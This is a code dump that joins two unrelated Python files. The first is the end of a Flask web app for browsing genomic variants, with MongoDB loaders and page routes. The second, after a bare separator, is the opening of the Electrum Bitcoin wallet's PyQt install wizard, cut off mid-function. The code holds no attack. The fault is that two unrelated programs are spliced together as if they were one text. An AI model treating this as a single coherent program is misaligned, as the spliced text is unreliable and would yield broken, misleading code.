with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
db.exons.insert((exon for exon in get_exons_from_gencode_gtf(gtf_file)), w=0)
print 'Done loading exons. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.exons.ensure_index('exon_id')
db.exons.ensure_index('transcript_id')
db.exons.ensure_index('gene_id')
print 'Done indexing exon table. Took %s seconds' % int(time.time() - start_time)
return []
def load_cnv_models():
db = get_db()
db.cnvs.drop()
print 'Dropped db.cnvs.'
start_time = time.time()
with open(app.config['CNV_FILE']) as cnv_txt_file:
for cnv in get_cnvs_from_txt(cnv_txt_file):
db.cnvs.insert(cnv, w=0)
#progress.update(gtf_file.fileobj.tell())
#progress.finish()
print 'Done loading CNVs. Took %s seconds' % int(time.time() - start_time)
def drop_cnv_genes():
db = get_db()
start_time = time.time()
db.cnvgenes.drop()
def load_cnv_genes():
db = get_db()
start_time = time.time()
with open(app.config['CNV_GENE_FILE']) as cnv_gene_file:
for cnvgene in get_cnvs_per_gene(cnv_gene_file):
db.cnvgenes.insert(cnvgene, w=0)
#progress.update(gtf_file.fileobj.tell())
#progress.finish()
print 'Done loading CNVs in genes. Took %s seconds' % int(time.time() - start_time)
def load_dbsnp_file():
db = get_db()
def load_dbsnp(dbsnp_file, i, n, db):
if os.path.isfile(dbsnp_file + ".tbi"):
dbsnp_record_generator = parse_tabix_file_subset([dbsnp_file], i, n, get_snp_from_dbsnp_file)
try:
db.dbsnp.insert(dbsnp_record_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when coverage_generator is empty
else:
with gzip.open(dbsnp_file) as f:
db.dbsnp.insert((snp for snp in get_snp_from_dbsnp_file(f)), w=0)
db.dbsnp.drop()
db.dbsnp.ensure_index('rsid')
db.dbsnp.ensure_index('xpos')
start_time = time.time()
dbsnp_file = app.config['DBSNP_FILE']
print "Loading dbsnp from %s" % dbsnp_file
if os.path.isfile(dbsnp_file + ".tbi"):
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
else:
# see if non-tabixed .gz version exists
if os.path.isfile(dbsnp_file):
print(("WARNING: %(dbsnp_file)s.tbi index file not found. Will use single thread to load dbsnp."
"To create a tabix-indexed dbsnp file based on UCSC dbsnp, do: \n"
" wget http://hgdownload.soe.ucsc.edu/goldenPath/hg19/database/snp141.txt.gz \n"
" gzcat snp141.txt.gz | cut -f 1-5 | bgzip -c > snp141.txt.bgz \n"
" tabix -0 -s 2 -b 3 -e 4 snp141.txt.bgz") % locals())
num_procs = 1
else:
raise Exception("dbsnp file %s(dbsnp_file)s not found." % locals())
procs = []
for i in range(num_procs):
p = Process(target=load_dbsnp, args=(dbsnp_file, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading dbSNP. Took %s seconds' % int(time.time() - start_time)
#start_time = time.time()
#db.dbsnp.ensure_index('rsid')
#print 'Done indexing dbSNP table. Took %s seconds' % int(time.time() - start_time)
def load_db():
"""
Load the database
"""
# Initialize database
# Don't need to explicitly create tables with mongo, just indices
confirm = raw_input('This will drop the database and reload. Are you sure you want to continue? [no] ')
if not confirm.startswith('y'):
print('Exiting...')
sys.exit(1)
all_procs = []
for load_function in [load_variants_file, load_dbsnp_file, load_base_coverage, load_gene_models, load_constraint_information, load_cnv_models, load_cnv_genes]:
procs = load_function()
all_procs.extend(procs)
print("Started %s processes to run %s" % (len(procs), load_function.__name__))
[p.join() for p in all_procs]
print('Done! Loading MNPs...')
load_mnps()
print('Done! Creating cache...')
create_cache()
print('Done!')
def create_cache():
"""
This is essentially a compile step that generates all cached resources.
Creates files like autocomplete_entries.txt
Should be run on every redeploy.
"""
# create autocomplete_entries.txt
autocomplete_strings = []
for gene in get_db().genes.find():
autocomplete_strings.append(gene['gene_name'])
if 'other_names' in gene:
autocomplete_strings.extend(gene['other_names'])
f = open(os.path.join(os.path.dirname(__file__), 'autocomplete_strings.txt'), 'w')
for s in sorted(autocomplete_strings):
f.write(s+'\n')
f.close()
# create static gene pages for genes in
if not os.path.exists(GENE_CACHE_DIR):
os.makedirs(GENE_CACHE_DIR)
# get list of genes ordered by num_variants
for gene_id in GENES_TO_CACHE:
try:
page_content = get_gene_page_content(gene_id)
except Exception as e:
print e
continue
f = open(os.path.join(GENE_CACHE_DIR, '{}.html'.format(gene_id)), 'w')
f.write(page_content)
f.close()
def precalculate_metrics():
import numpy
db = get_db()
print 'Reading %s variants...' % db.variants.count()
metrics = defaultdict(list)
binned_metrics = defaultdict(list)
progress = 0
start_time = time.time()
for variant in db.variants.find(fields=['quality_metrics', 'site_quality', 'allele_num', 'allele_count']):
for metric, value in variant['quality_metrics'].iteritems():
metrics[metric].append(float(value))
qual = float(variant['site_quality'])
metrics['site_quality'].append(qual)
if variant['allele_num'] == 0: continue
if variant['allele_count'] == 1:
binned_metrics['singleton'].append(qual)
elif variant['allele_count'] == 2:
binned_metrics['doubleton'].append(qual)
else:
for af in AF_BUCKETS:
if float(variant['allele_count'])/variant['allele_num'] < af:
binned_metrics[af].append(qual)
break
progress += 1
if not progress % 100000:
print 'Read %s variants. Took %s seconds' % (progress, int(time.time() - start_time))
print 'Done reading variants. Dropping metrics database... '
db.metrics.drop()
print 'Dropped metrics database. Calculating metrics...'
for metric in metrics:
bin_range = None
data = map(numpy.log, metrics[metric]) if metric == 'DP' else metrics[metric]
if metric == 'FS':
bin_range = (0, 20)
elif metric == 'VQSLOD':
bin_range = (-20, 20)
elif metric == 'InbreedingCoeff':
bin_range = (0, 1)
if bin_range is not None:
data = [x if (x > bin_range[0]) else bin_range[0] for x in data]
data = [x if (x < bin_range[1]) else bin_range[1] for x in data]
hist = numpy.histogram(data, bins=40, range=bin_range)
edges = hist[1]
# mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
lefts = [edges[i] for i in range(len(edges)-1)]
db.metrics.insert({
'metric': metric,
'mids': lefts,
'hist': list(hist[0])
})
for metric in binned_metrics:
hist = numpy.histogram(map(numpy.log, binned_metrics[metric]), bins=40)
edges = hist[1]
mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
db.metrics.insert({
'metric': 'binned_%s' % metric,
'mids': mids,
'hist': list(hist[0])
})
db.metrics.ensure_index('metric')
print 'Done pre-calculating metrics!'
def get_db():
"""
Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'db_conn'):
g.db_conn = connect_db()
return g.db_conn
# @app.teardown_appcontext
# def close_db(error):
# """Closes the database again at the end of the request."""
# if hasattr(g, 'db_conn'):
# g.db_conn.close()
@app.route('/')
def homepage():
return render_template('homepage.html')
@app.route('/autocomplete/<query>')
def awesome_autocomplete(query):
if not hasattr(g, 'autocomplete_strings'):
g.autocomplete_strings = [s.strip() for s in open(os.path.join(os.path.dirname(__file__), 'autocomplete_strings.txt'))]
suggestions = lookups.get_awesomebar_suggestions(g, query)
return Response(json.dumps([{'value': s} for s in suggestions]), mimetype='application/json')
@app.route('/awesome')
def awesome():
db = get_db()
query = request.args.get('query')
datatype, identifier = lookups.get_awesomebar_result(db, query)
print "Searched for %s: %s" % (datatype, identifier)
if datatype == 'gene':
return redirect('/gene/{}'.format(identifier))
elif datatype == 'transcript':
return redirect('/transcript/{}'.format(identifier))
elif datatype == 'variant':
return redirect('/variant/{}'.format(identifier))
elif datatype == 'region':
return redirect('/region/{}'.format(identifier))
elif datatype == 'dbsnp_variant_set':
return redirect('/dbsnp/{}'.format(identifier))
elif datatype == 'error':
return redirect('/error/{}'.format(identifier))
elif datatype == 'not_found':
return redirect('/not_found/{}'.format(identifier))
else:
raise Exception
@app.route('/variant/<variant_str>')
def variant_page(variant_str):
db = get_db()
try:
chrom, pos, ref, alt = variant_str.split('-')
pos = int(pos)
# pos, ref, alt = get_minimal_representation(pos, ref, alt)
xpos = get_xpos(chrom, pos)
variant = lookups.get_variant(db, xpos, ref, alt)
if variant is None:
variant = {
'chrom': chrom,
'pos': pos,
'xpos': xpos,
'ref': ref,
'alt': alt
}
consequences = OrderedDict()
if 'vep_annotations' in variant:
add_consequence_to_variant(variant)
variant['vep_annotations'] = remove_extraneous_vep_annotations(variant['vep_annotations'])
variant['vep_annotations'] = order_vep_by_csq(variant['vep_annotations']) # Adds major_consequence
for annotation in variant['vep_annotations']:
annotation['HGVS'] = get_proper_hgvs(annotation)
consequences.setdefault(annotation['major_consequence'], {}).setdefault(annotation['Gene'], []).append(annotation)
base_coverage = lookups.get_coverage_for_bases(db, xpos, xpos + len(ref) - 1)
any_covered = any([x['has_coverage'] for x in base_coverage])
metrics = lookups.get_metrics(db, variant)
# check the appropriate sqlite db to get the *expected* number of
# available bams and *actual* number of available bams for this variant
sqlite_db_path = os.path.join(
app.config["READ_VIZ_DIR"],
"combined_bams",
chrom,
"combined_chr%s_%03d.db" % (chrom, pos % 1000))
logging.info(sqlite_db_path)
try:
read_viz_db = sqlite3.connect(sqlite_db_path)
n_het = read_viz_db.execute("select n_expected_samples, n_available_samples from t "
"where chrom=? and pos=? and ref=? and alt=? and het_or_hom_or_hemi=?", (chrom, pos, ref, alt, 'het')).fetchone()
n_hom = read_viz_db.execute("select n_expected_samples, n_available_samples from t "
"where chrom=? and pos=? and ref=? and alt=? and het_or_hom_or_hemi=?", (chrom, pos, ref, alt, 'hom')).fetchone()
n_hemi = read_viz_db.execute("select n_expected_samples, n_available_samples from t "
"where chrom=? and pos=? and ref=? and alt=? and het_or_hom_or_hemi=?", (chrom, pos, ref, alt, 'hemi')).fetchone()
read_viz_db.close()
except Exception, e:
logging.error("Error when accessing sqlite db: %s - %s", sqlite_db_path, e)
n_het = n_hom = n_hemi = None
read_viz_dict = {
'het': {'n_expected': n_het[0] if n_het is not None and n_het[0] is not None else 0,
'n_available': n_het[1] if n_het is not None and n_het[1] is not None else 0,},
'hom': {'n_expected': n_hom[0] if n_hom is not None and n_hom[0] is not None else 0,
'n_available': n_hom[1] if n_hom is not None and n_hom[1] is not None else 0,},
'hemi': {'n_expected': n_hemi[0] if n_hemi is not None and n_hemi[0] is not None else 0,
'n_available': n_hemi[1] if n_hemi is not None and n_hemi[1] is not None else 0,},
}
total_available = 0
total_expected = 0
for het_or_hom_or_hemi in ('het', 'hom', 'hemi'):
total_available += read_viz_dict[het_or_hom_or_hemi]['n_available']
total_expected += read_viz_dict[het_or_hom_or_hemi]['n_expected']
read_viz_dict[het_or_hom_or_hemi]['readgroups'] = [
'%(chrom)s-%(pos)s-%(ref)s-%(alt)s_%(het_or_hom_or_hemi)s%(i)s' % locals()
for i in range(read_viz_dict[het_or_hom_or_hemi]['n_available'])
] #eg. '1-157768000-G-C_hom1',
read_viz_dict[het_or_hom_or_hemi]['urls'] = [
#os.path.join('combined_bams', chrom, 'combined_chr%s_%03d.bam' % (chrom, pos % 1000))
os.path.join('combined_bams', chrom, 'combined_chr%s_%03d.bam' % (chrom, pos % 1000))
for i in range(read_viz_dict[het_or_hom_or_hemi]['n_available'])
]
read_viz_dict['total_available'] = total_available
read_viz_dict['total_expected'] = total_expected
print 'Rendering variant: %s' % variant_str
return render_template(
'variant.html',
variant=variant,
base_coverage=base_coverage,
consequences=consequences,
any_covered=any_covered,
metrics=metrics,
read_viz=read_viz_dict,
)
except Exception:
print 'Failed on variant:', variant_str, ';Error=', traceback.format_exc()
abort(404)
@app.route('/gene/<gene_id>')
def gene_page(gene_id):
if gene_id in GENES_TO_CACHE:
return open(os.path.join(GENE_CACHE_DIR, '{}.html'.format(gene_id))).read()
else:
return get_gene_page_content(gene_id)
def get_gene_page_content(gene_id):
db = get_db()
try:
gene = lookups.get_gene(db, gene_id)
if gene is None:
abort(404)
cache_key = 't-gene-{}'.format(gene_id)
t = cache.get(cache_key)
if t is None:
variants_in_gene = lookups.get_variants_in_gene(db, gene_id)
transcripts_in_gene = lookups.get_transcripts_in_gene(db, gene_id)
# Get some canonical transcript and corresponding info
transcript_id = gene['canonical_transcript']
transcript = lookups.get_transcript(db, transcript_id)
variants_in_transcript = lookups.get_variants_in_transcript(db, transcript_id)
cnvs_in_transcript = lookups.get_exons_cnvs(db, transcript_id)
cnvs_per_gene = lookups.get_cnvs(db, gene_id)
coverage_stats = lookups.get_coverage_for_transcript(db, transcript['xstart'] - EXON_PADDING, transcript['xstop'] + EXON_PADDING)
add_transcript_coordinate_to_variants(db, variants_in_transcript, transcript_id)
constraint_info = lookups.get_constraint_for_transcript(db, transcript_id)
t = render_template(
'gene.html',
gene=gene,
transcript=transcript,
variants_in_gene=variants_in_gene,
variants_in_transcript=variants_in_transcript,
transcripts_in_gene=transcripts_in_gene,
coverage_stats=coverage_stats,
cnvs = cnvs_in_transcript,
cnvgenes = cnvs_per_gene,
constraint=constraint_info
)
cache.set(cache_key, t, timeout=1000*60)
print 'Rendering gene: %s' % gene_id
return t
except Exception, e:
print 'Failed on gene:', gene_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/transcript/<transcript_id>')
def transcript_page(transcript_id):
db = get_db()
try:
transcript = lookups.get_transcript(db, transcript_id)
cache_key = 't-transcript-{}'.format(transcript_id)
t = cache.get(cache_key)
if t is None:
gene = lookups.get_gene(db, transcript['gene_id'])
gene['transcripts'] = lookups.get_transcripts_in_gene(db, transcript['gene_id'])
variants_in_transcript = lookups.get_variants_in_transcript(db, transcript_id)
cnvs_in_transcript = lookups.get_exons_cnvs(db, transcript_id)
cnvs_per_gene = lookups.get_cnvs(db, transcript['gene_id'])
coverage_stats = lookups.get_coverage_for_transcript(db, transcript['xstart'] - EXON_PADDING, transcript['xstop'] + EXON_PADDING)
add_transcript_coordinate_to_variants(db, variants_in_transcript, transcript_id)
t = render_template(
'transcript.html',
transcript=transcript,
transcript_json=json.dumps(transcript),
variants_in_transcript=variants_in_transcript,
variants_in_transcript_json=json.dumps(variants_in_transcript),
coverage_stats=coverage_stats,
coverage_stats_json=json.dumps(coverage_stats),
gene=gene,
gene_json=json.dumps(gene),
cnvs = cnvs_in_transcript,
cnvs_json=json.dumps(cnvs_in_transcript),
cnvgenes = cnvs_per_gene,
cnvgenes_json=json.dumps(cnvs_per_gene)
)
cache.set(cache_key, t, timeout=1000*60)
print 'Rendering transcript: %s' % transcript_id
return t
except Exception, e:
print 'Failed on transcript:', transcript_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/region/<region_id>')
def region_page(region_id):
db = get_db()
try:
region = region_id.split('-')
cache_key = 't-region-{}'.format(region_id)
t = cache.get(cache_key)
if t is None:
chrom = region[0]
start = None
stop = None
if len(region) == 3:
chrom, start, stop = region
start = int(start)
stop = int(stop)
if start is None or stop - start > REGION_LIMIT or stop < start:
return render_template(
'region.html',
genes_in_region=None,
variants_in_region=None,
chrom=chrom,
start=start,
stop=stop,
coverage=None
)
if start == stop:
start -= 20
stop += 20
genes_in_region = lookups.get_genes_in_region(db, chrom, start, stop)
variants_in_region = lookups.get_variants_in_region(db, chrom, start, stop)
xstart = get_xpos(chrom, start)
xstop = get_xpos(chrom, stop)
coverage_array = lookups.get_coverage_for_bases(db, xstart, xstop)
t = render_template(
'region.html',
genes_in_region=genes_in_region,
variants_in_region=variants_in_region,
chrom=chrom,
start=start,
stop=stop,
coverage=coverage_array
)
print 'Rendering region: %s' % region_id
return t
except Exception, e:
print 'Failed on region:', region_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/dbsnp/<rsid>')
def dbsnp_page(rsid):
db = get_db()
try:
variants = lookups.get_variants_by_rsid(db, rsid)
chrom = None
start = None
stop = None
print 'Rendering rsid: %s' % rsid
return render_template(
'region.html',
rsid=rsid,
variants_in_region=variants,
chrom=chrom,
start=start,
stop=stop,
coverage=None,
genes_in_region=None
)
except Exception, e:
print 'Failed on rsid:', rsid, ';Error=', traceback.format_exc()
abort(404)
@app.route('/not_found/<query>')
@app.errorhandler(404)
def not_found_page(query):
return render_template(
'not_found.html',
query=query
), 404
@app.route('/error/<query>')
@app.errorhandler(404)
def error_page(query):
return render_template(
'error.html',
query=query
), 404
@app.route('/downloads')
def downloads_page():
return render_template('downloads.html')
@app.route('/about')
def about_page():
return render_template('about.html')
@app.route('/participants')
def participants_page():
return render_template('about.html')
@app.route('/terms')
def terms_page():
return render_template('terms.html')
@app.route('/contact')
def contact_page():
return render_template('contact.html')
@app.route('/faq')
def faq_page():
return render_template('faq.html')
@app.route('/text')
def text_page():
db = get_db()
query = request.args.get('text')
datatype, identifier = lookups.get_awesomebar_result(db, query)
if datatype in ['gene', 'transcript']:
gene = lookups.get_gene(db, identifier)
link = "http://genome.ucsc.edu/cgi-bin/hgTracks?db=hg19&position=chr%(chrom)s%%3A%(start)s-%(stop)s" % gene
output = '''Searched for %s. Found %s.
%s; Canonical: %s.
%s''' % (query, identifier, gene['full_gene_name'], gene['canonical_transcript'], link)
output += '' if 'omim_accession' not in gene else '''
In OMIM: %(omim_description)s
http://omim.org/entry/%(omim_accession)s''' % gene
return output
elif datatype == 'error' or datatype == 'not_found':
return "Gene/transcript %s not found" % query
else:
return "Search types other than gene transcript not yet supported"
@app.route('/read_viz/<path:path>')
def read_viz_files(path):
full_path = os.path.abspath(os.path.join(app.config["READ_VIZ_DIR"], path))
# security check - only files under READ_VIZ_DIR should be accsessible
if not full_path.startswith(app.config["READ_VIZ_DIR"]):
return "Invalid path: %s" % path
# handle igv.js Range header which it uses to request a subset of a .bam
range_header = request.headers.get('Range', None)
if not range_header:
return send_from_directory(app.config["READ_VIZ_DIR"], path)
m = re.search('(\d+)-(\d*)', range_header)
if not m:
error_msg = "ERROR: unexpected range header syntax: %s" % range_header
logging.error(error_msg)
return error_msg
size = os.path.getsize(full_path)
offset = int(m.group(1))
length = int(m.group(2) or size) - offset
data = None
with open(full_path, 'rb') as f:
f.seek(offset)
data = f.read(length)
rv = Response(data, 206, mimetype="application/octet-stream", direct_passthrough=True)
rv.headers.add('Content-Range', 'bytes {0}-{1}/{2}'.format(offset, offset + length - 1, size))
logging.info("readviz: range request: %s-%s %s" % (m.group(1), m.group(2), full_path))
return rv
if __name__ == "__main__":
runner = Runner(app) # adds Flask command line options for setting host, port, etc.
runner.run()
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
if filename:
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
else:
msg = ""
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
